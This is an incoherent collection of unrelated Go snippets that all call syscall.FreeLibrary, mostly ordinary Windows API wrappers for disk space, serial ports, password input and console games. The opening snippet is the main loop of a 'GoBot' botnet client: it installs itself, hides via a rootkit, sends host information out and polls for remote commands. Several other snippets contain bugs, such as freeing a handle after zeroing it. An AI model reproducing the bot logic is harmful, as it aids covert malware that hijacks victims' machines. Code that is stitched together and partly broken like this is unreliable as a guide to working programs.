func main() {
defer syscall.FreeLibrary(kernel32)
defer syscall.FreeLibrary(user32)
if SingleInstance != false {
err := singleInstance(InstanceKey)
if err != nil {
}
}
DebugLog("Started New Instance...")
DebugLog("Generating HWID: " + getUID())
if USE_Install {
DebugLog("Installing GoBot...")
Install()
}
if USE_Stealth && USE_Install {
DebugLog("Stealth Installing GoBot...")
rootkit.Stealthify()
}
if USE_Rootkit && USE_Stealth && USE_Install {
DebugLog("Installing GoBot and Activating Rootkit...")
go rootkit.Install()
}
//DebugLog("Sleeping for 1 minute...")
//time.Sleep(60 * time.Second)
httpPOSTInformation()
for {
time.Sleep(ReconnectTime * time.Second)
httpGETCommands()
}
}
func main() {
defer syscall.FreeLibrary(kernel32)
defer syscall.FreeLibrary(user32)
//fmt.Printf("Retern: %d\n", MessageBox("Done Title", "This test is Done.", MB_YESNOCANCEL))
num := MessageBox("Done Title", "This test is Done.", MB_YESNOCANCEL)
if num == 6 {
fmt.Printf("Return %d\n", num)
} else {
fmt.Printf("others")
}
}
func (jst *IDCGeneral) Initdriver(pin *driverlayer.DriverArg) {
var err error
jst.termdll, err = syscall.LoadLibrary("third_party/general/sdtapi.dll")
if err != nil {
panic("load library error:" + err.Error())
}
f := func(n string, res *uintptr) bool {
*res, err = syscall.GetProcAddress(jst.termdll, n)
if err != nil {
syscall.FreeLibrary(jst.termdll)
panic("load proc " + n + " error:" + err.Error())
}
return true
}
//获得dll的各种handle
if f("SDT_OpenPort", &jst.initcomm) &&
f("SDT_ClosePort", &jst.closecomm) &&
f("SDT_StartFindIDCard", &jst.findcard) &&
f("SDT_SelectIDCard", &jst.selectcard) &&
f("SDT_ReadBaseMsg", &jst.readbasemsg) {
} else {
utils.Error("Init shensi Driver error...%s", err.Error())
}
}
// Returns total and free bytes available in a directory.
// It returns free space available to the user (including quota limitations),
// so it can be lower than the free space of the disk.
func DiskSpace(path string) (total, free int64, err error) {
kernel32, err := syscall.LoadLibrary("Kernel32.dll")
if err != nil {
return
}
defer syscall.FreeLibrary(kernel32)
GetDiskFreeSpaceEx, err := syscall.GetProcAddress(
syscall.Handle(kernel32), "GetDiskFreeSpaceExW")
if err != nil {
return
}
lpFreeBytesAvailable := int64(0)
lpTotalNumberOfBytes := int64(0)
lpTotalNumberOfFreeBytes := int64(0)
r1, _, e1 := syscall.Syscall6(uintptr(GetDiskFreeSpaceEx), 4,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(path))),
uintptr(unsafe.Pointer(&lpFreeBytesAvailable)),
uintptr(unsafe.Pointer(&lpTotalNumberOfBytes)),
uintptr(unsafe.Pointer(&lpTotalNumberOfFreeBytes)), 0, 0)
if r1 == 0 {
if e1 != 0 {
err = error(e1)
} else {
err = syscall.EINVAL
}
return
}
total = lpTotalNumberOfBytes
free = lpFreeBytesAvailable
return
}
func (p *Dll) FreeLibrary() error {
if p.IsDllLoaded() {
p.dllHandler = 0
return syscall.FreeLibrary(p.dllHandler)
}
return nil
}
func main() {
//首先,准备输入参数, GetDiskFreeSpaceEx需要4个参数, 可查MSDN
// dir := "C:"
lpFreeBytesAvailable := int64(0) //注意类型需要跟API的类型相符
lpTotalNumberOfBytes := int64(0)
lpTotalNumberOfFreeBytes := int64(0)
//获取方法的引用
kernel32, err := syscall.LoadLibrary("Kernel32.dll") // 严格来说需要加上 defer syscall.FreeLibrary(kernel32)
if err != nil {
log.Println(err.Error())
}
defer syscall.FreeLibrary(kernel32)
GetDiskFreeSpaceEx, err := syscall.GetProcAddress(syscall.Handle(kernel32), "GetDiskFreeSpaceExW")
//执行之. 因为有4个参数,故取Syscall6才能放得下. 最后2个参数,自然就是0了
r, _, errno := syscall.Syscall6(uintptr(GetDiskFreeSpaceEx), 4,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),
uintptr(unsafe.Pointer(&lpFreeBytesAvailable)),
uintptr(unsafe.Pointer(&lpTotalNumberOfBytes)),
uintptr(unsafe.Pointer(&lpTotalNumberOfFreeBytes)), 0, 0)
if errno != 0 {
log.Println(errno)
}
// 注意, errno并非error接口的, 不可能是nil
// 而且,根据MSDN的说明,返回值为0就fail, 不为0就是成功
if r != 0 {
log.Printf("Free %dmb", lpTotalNumberOfFreeBytes/1024/1024)
}
}
func Rename(src, dst string) error {
kernel32, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
return err
}
defer syscall.FreeLibrary(kernel32)
moveFileExUnicode, err := syscall.GetProcAddress(kernel32, "MoveFileExW")
if err != nil {
return err
}
srcString, err := syscall.UTF16PtrFromString(src)
if err != nil {
return err
}
dstString, err := syscall.UTF16PtrFromString(dst)
if err != nil {
return err
}
srcPtr := uintptr(unsafe.Pointer(srcString))
dstPtr := uintptr(unsafe.Pointer(dstString))
MOVEFILE_REPLACE_EXISTING := 0x1
flag := uintptr(MOVEFILE_REPLACE_EXISTING)
_, _, callErr := syscall.Syscall(uintptr(moveFileExUnicode), 3, srcPtr, dstPtr, flag)
if callErr != 0 {
return callErr
}
return nil
}
// *************************************************************************
// We can probably delete this, it is an alternative version in case we have
// problems with simpler version above
// *************************************************************************
func freeDiskSpaceBytes2(dir string) (uint64, error) {
kernel32, err := syscall.LoadLibrary("Kernel32.dll")
if err != nil {
log.Panic(err)
}
defer syscall.FreeLibrary(kernel32)
GetDiskFreeSpaceEx, err := syscall.GetProcAddress(syscall.Handle(kernel32), "GetDiskFreeSpaceExW")
if err != nil {
return 0, err
}
lpFreeBytesAvailable := int64(0)
lpTotalNumberOfBytes := int64(0)
lpTotalNumberOfFreeBytes := int64(0)
r, a, b := syscall.Syscall6(
uintptr(GetDiskFreeSpaceEx),
4,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),
uintptr(unsafe.Pointer(&lpFreeBytesAvailable)),
uintptr(unsafe.Pointer(&lpTotalNumberOfBytes)),
uintptr(unsafe.Pointer(&lpTotalNumberOfFreeBytes)),
0,
0,
)
log.Print("Disk space:", r, a, b, lpFreeBytesAvailable, lpTotalNumberOfBytes, lpTotalNumberOfFreeBytes)
return uint64(lpFreeBytesAvailable), nil
}
func Password(prompt string) (string, error) {
defer syscall.FreeLibrary(kernel32)
fmt.Print(prompt)
var pass string
if os.Getenv("BABUN_HOME") != "" {
fmt.Scanf("%s", &pass)
return pass, nil
}
var c rune
for c != '\r' {
var err error
c, err = getChar()
if err != nil {
return "", err
}
fmt.Print("*")
if c != '\r' {
pass += string(c)
}
}
fmt.Println()
return pass, nil
}
func testFail() {
h, err := syscall.LoadLibrary("msvcrt")
if err != nil {
fmt.Println(err)
return
}
defer syscall.FreeLibrary(h)
proc, err := syscall.GetProcAddress(h, "memcpy")
if err != nil {
fmt.Println(err)
return
}
// dst := unsafe.Pointer(uintptr(1))
// src := unsafe.Pointer(uintptr(2))
// count := unsafe.Pointer(uintptr(4))
dst := uintptr(1)
src := uintptr(2)
count := uintptr(3)
fmt.Println("test memcpy error in go...")
r, _, _ := syscall.Syscall(uintptr(proc), 3, dst, src, count)
fmt.Println(r)
fmt.Println("should not run here")
}
func init() {
k32, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
panic("LoadLibrary " + err.Error())
}
defer syscall.FreeLibrary(k32)
versionAddr, err = syscall.GetProcAddress(k32, "GetVersion")
}
func init() {
kernel32, loadErr := syscall.LoadLibrary("kernel32.dll")
if loadErr != nil {
fmt.Println("loadErr", loadErr)
}
defer syscall.FreeLibrary(kernel32)
_SetConsoleTitle, _ = syscall.GetProcAddress(kernel32, "SetConsoleTitleW")
}
func init() {
k32, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
panic("LoadLibrary " + err.Error())
}
defer syscall.FreeLibrary(k32)
nGetOverlappedResult = getProcAddr(k32, "GetOverlappedResult")
nCreateEvent = getProcAddr(k32, "CreateEventW")
nResetEvent = getProcAddr(k32, "ResetEvent")
}
func main() {
k32dll := syscall.MustLoadDLL("kernel32.dll")
defer syscall.FreeLibrary(k32dll.Handle)
getVersion, err := k32dll.FindProc("GetVersion")
CheckError(err)
ret, _, _ := getVersion.Call()
printVersion(uint32(ret))
}
func initialize() {
// 初始化蛇的位置和方向、首尾;初始化随机数
head, tail = loct{4, 4}, loct{4, 4}
lead, size = 'R', 1
area[4][4] = 'H'
rand.Seed(int64(time.Now().Unix()))
defer syscall.FreeLibrary(kernel32)
SetConsoleTextAttribute(hCon, 0x0075)
// 输出初始画面
fmt.Println(" ^0^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^0^ ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" || || ")
fmt.Println(" ^0^$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^0^ ")
// 使用一个单独的go程来捕捉键盘的动作,因为是单独的,不怕阻塞
go func() {
for { // 函数只写入lead,外部只读取lead,无需设锁
switch byte(C.direct()) {
case 72:
lead = 'U'
case 75:
lead = 'L'
case 77:
lead = 'R'
case 80:
lead = 'D'
case 32:
lead = 'P'
}
}
}()
}
func main() {
h, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
abort("LoadLibrary", err)
}
defer syscall.FreeLibrary(h)
proc, err := syscall.GetProcAddress(h, "GetVersion")
if err != nil {
abort("GetProcAddress", err)
}
r, _, _ := syscall.Syscall(uintptr(proc), 0, 0, 0, 0)
print_version(uint32(r))
}
// Full path of the current executable
func GetExecutableFileName() string {
kernel32, _ := syscall.LoadLibrary("kernel32.dll")
defer syscall.FreeLibrary(kernel32)
b := make([]uint16, syscall.MAX_PATH)
getModuleFileName, _ := syscall.GetProcAddress(kernel32, "GetModuleFileNameW")
ret, _, callErr := syscall.Syscall(uintptr(getModuleFileName),
3, 0,
uintptr(unsafe.Pointer(&b[0])),
uintptr(len(b)))
if callErr != 0 {
panic(fmt.Sprintf("GetModuleFileNameW : err %d", int(callErr)))
}
return string(utf16.Decode(b[:ret]))
}
func callKernel32Procedure(procedureName string, procedureCaller func(uintptr) error) (err error) {
kernelHandle, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
return err
}
defer syscall.FreeLibrary(kernelHandle)
procedureAddress, err := syscall.GetProcAddress(kernelHandle, procedureName)
if err != nil {
return err
}
return procedureCaller(procedureAddress)
}
func init() {
k32, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
panic("LoadLibrary " + err.Error())
}
defer syscall.FreeLibrary(k32)
nSetCommState = getProcAddr(k32, "SetCommState")
nSetCommTimeouts = getProcAddr(k32, "SetCommTimeouts")
nSetCommMask = getProcAddr(k32, "SetCommMask")
nSetupComm = getProcAddr(k32, "SetupComm")
nGetOverlappedResult = getProcAddr(k32, "GetOverlappedResult")
nCreateEvent = getProcAddr(k32, "CreateEventW")
nResetEvent = getProcAddr(k32, "ResetEvent")
}
func init() {
handle, err := syscall.LoadLibrary("kernel32.dll")
if err == nil {
nSetCommState = getProcAddr(handle, "SetCommState")
nEscapeCommFunction = getProcAddr(handle, "EscapeCommFunction")
nSetCommTimeouts = getProcAddr(handle, "SetCommTimeouts")
nSetCommMask = getProcAddr(handle, "SetCommMask")
nSetupComm = getProcAddr(handle, "SetupComm")
nGetOverlappedResult = getProcAddr(handle, "GetOverlappedResult")
nCreateEvent = getProcAddr(handle, "CreateEventW")
nResetEvent = getProcAddr(handle, "ResetEvent")
syscall.FreeLibrary(handle)
} else {
panic("LoadLibrary " + err.Error())
}
}
func ExampleLoadLibrary() {
h, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
abort("LoadLibrary", err)
}
defer syscall.FreeLibrary(h)
proc, err := syscall.GetProcAddress(h, "GetVersion")
if err != nil {
abort("GetProcAddress", err)
}
r, _, _ := syscall.Syscall(uintptr(proc), 0, 0, 0, 0)
major := byte(r)
minor := uint8(r >> 8)
build := uint16(r >> 16)
print("windows version ", major, ".", minor, " (Build ", build, ")\n")
}
func init() {
k32, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
panic(fmt.Sprintf("[ERROR] LoadLibrary %v", err))
}
defer syscall.FreeLibrary(k32)
nSetCommState = getProcAddr(k32, "SetCommState")
nSetCommTimeouts = getProcAddr(k32, "SetCommTimeouts")
nSetCommMask = getProcAddr(k32, "SetCommMask")
nSetupComm = getProcAddr(k32, "SetupComm")
nGetOverlappedResult = getProcAddr(k32, "GetOverlappedResult")
nCreateEvent = getProcAddr(k32, "CreateEventW")
nResetEvent = getProcAddr(k32, "ResetEvent")
nWaitCommEvent = getProcAddr(k32, "WaitCommEvent")
}
func Startui() {
fmt.Println(" 仿真游戏集合® By golang")
fmt.Println(" ---by Ahmed_Zetao_Yang")
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Println()
fmt.Print(" ")
defer syscall.FreeLibrary(kernel32)
SetConsoleTextAttribute(hCon, 0x001d)
fmt.Println("正在进入游戏集")
SetConsoleTextAttribute(hCon, 0x0007) //恢复默认值
fmt.Print(" ✈")
for i := 1; i <= 100; i++ {
time.Sleep(50 * time.Millisecond)
SetConsoleTextAttribute(hCon, 0x00b0)
fmt.Print(".")
SetConsoleTextAttribute(hCon, 0x0007) //恢复默认值
if i%2 == 0 || i%3 == 2 || i%5 == 0 || i%4 == 0 {
fmt.Print("\b\b")
}
SetConsoleTextAttribute(hCon, 0x00e0)
fmt.Printf("赶集中%d%%", i)
SetConsoleTextAttribute(hCon, 0x0007) //恢复默认值
time.Sleep(80 * time.Millisecond) //✈✳☁❄☀⤵⤴®✖™✖☑✔
if i < 10 {
fmt.Printf("\b\b\b\b\b\b\b") //\b\b\b\b\b=赶集中
} else {
fmt.Printf("\b\b\b\b\b\b\b\b")
}
}
}
func getModuleFileName(buflen uint32, buf *uint16) (n uint32, err error) {
h, err := syscall.LoadLibrary("kernel32.dll")
if err != nil {
return 0, err
}
defer syscall.FreeLibrary(h)
addr, err := syscall.GetProcAddress(h, "GetModuleFileNameW")
if err != nil {
return 0, err
}
r0, _, e1 := syscall.Syscall(addr, 3, uintptr(0), uintptr(unsafe.Pointer(buf)), uintptr(buflen))
n = uint32(r0)
if n == 0 {
if e1 != 0 {
err = error(e1)
} else {
err = syscall.EINVAL
}
}
return
}
func main() {
h, err := syscall.LoadLibrary("PowerPointWrapper.dll")
if err != nil {
}
defer syscall.FreeLibrary(h)
procInitialize, err := syscall.GetProcAddress(h, "Initialize")
if err != nil {
fmt.Println(err.Error())
}
procPresentationCurrentSlideNote, err := syscall.GetProcAddress(h, "PresentationCurrentSlideNote")
if err != nil {
fmt.Println(err.Error())
}
procUninitialize, err := syscall.GetProcAddress(h, "Uninitialize")
if err != nil {
fmt.Println(err.Error())
}
var noteBuffer [noteBufferLen]uint8
_, _, err = syscall.Syscall(uintptr(procInitialize), 0, 0, 0, 0)
for i := 0; i < 3; i++ {
noteLen, _, err := syscall.Syscall(uintptr(procPresentationCurrentSlideNote), 2, uintptr(unsafe.Pointer(¬eBuffer)), uintptr(noteBufferLen), 0)
if err != 0 {
fmt.Println(err)
continue
}
note := string(noteBuffer[:int(noteLen)])
replacedNote := strings.Replace(note, "\r", "\n", -1)
//writeLines([]string{note}, "b.txt")
fmt.Printf("note: `%s`nstrlen: %d\n", replacedNote, len(note))
}
_, _, err = syscall.Syscall(uintptr(procUninitialize), 0, 0, 0, 0)
}
func Password(prompt string) (string, error) {
defer syscall.FreeLibrary(kernel32)
fmt.Print(prompt)
var pass string
if os.Getenv("BABUN_HOME") != "" {
fmt.Scanf("%s", &pass)
return pass, nil
}
if strings.HasSuffix(os.Getenv("SHELL"), "/usr/bin/bash") {
var c rune
var password string
MakeRaw(os.Stdin)
defer Restore(os.Stdin)
for c != '\n' {
fmt.Scanf("%c", &c)
fmt.Print("*")
password = fmt.Sprintf("%s%c", password, c)
}
fmt.Println()
return strings.TrimSpace(password), nil
}
var c rune
for c != '\r' {
var err error
c, err = getChar()
if err != nil {
return "", err
}
fmt.Print("*")
if c != '\r' {
pass += string(c)
}
}
fmt.Println()
return pass, nil
}
func (jst *ICGeneral) Initdriver(pin *driverlayer.DriverArg) {
var err error
jst.winsdll, err = syscall.LoadLibrary("third_party/general/iccardreader.dll")
if err != nil {
panic("load library error:" + err.Error())
}
f := func(n string, res *uintptr) bool {
*res, err = syscall.GetProcAddress(jst.winsdll, n)
if err != nil {
syscall.FreeLibrary(jst.winsdll)
panic("load proc " + n + " error:" + err.Error())
}
return true
}
//获得dll的各种handle
if f("ReadICCard", &jst.readcard) {
} else {
utils.Error("Init general Driver error...%s", err.Error())
}
}
func FreeSpace(path string) (int64, error) {
kernel32, err := syscall.LoadLibrary("Kernel32.dll")
if err != nil {
return 0, err
}
defer syscall.FreeLibrary(kernel32)
GetDiskFreeSpaceEx, err := syscall.GetProcAddress(syscall.Handle(kernel32), "GetDiskFreeSpaceExW")
if err != nil {
return 0, err
}
lpFreeBytesAvailable := int64(0)
if r1, _, e1 := syscall.Syscall6(uintptr(GetDiskFreeSpaceEx), 4,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(path))),
uintptr(unsafe.Pointer(&lpFreeBytesAvailable)), 0, 0, 0, 0); r1 == 0 {
if e1 != 0 {
return 0, error(e1)
} else {
return 0, syscall.EINVAL
}
}
return lpFreeBytesAvailable, nil
}
func FreeLib() {
fmt.Print("Ending\n")
syscall.FreeLibrary(miflib)
syscall.FreeLibrary(user32)
}
func (dllCls *DLLClass) Free() {
syscall.FreeLibrary(syscall.Handle(dllCls.Handle))
}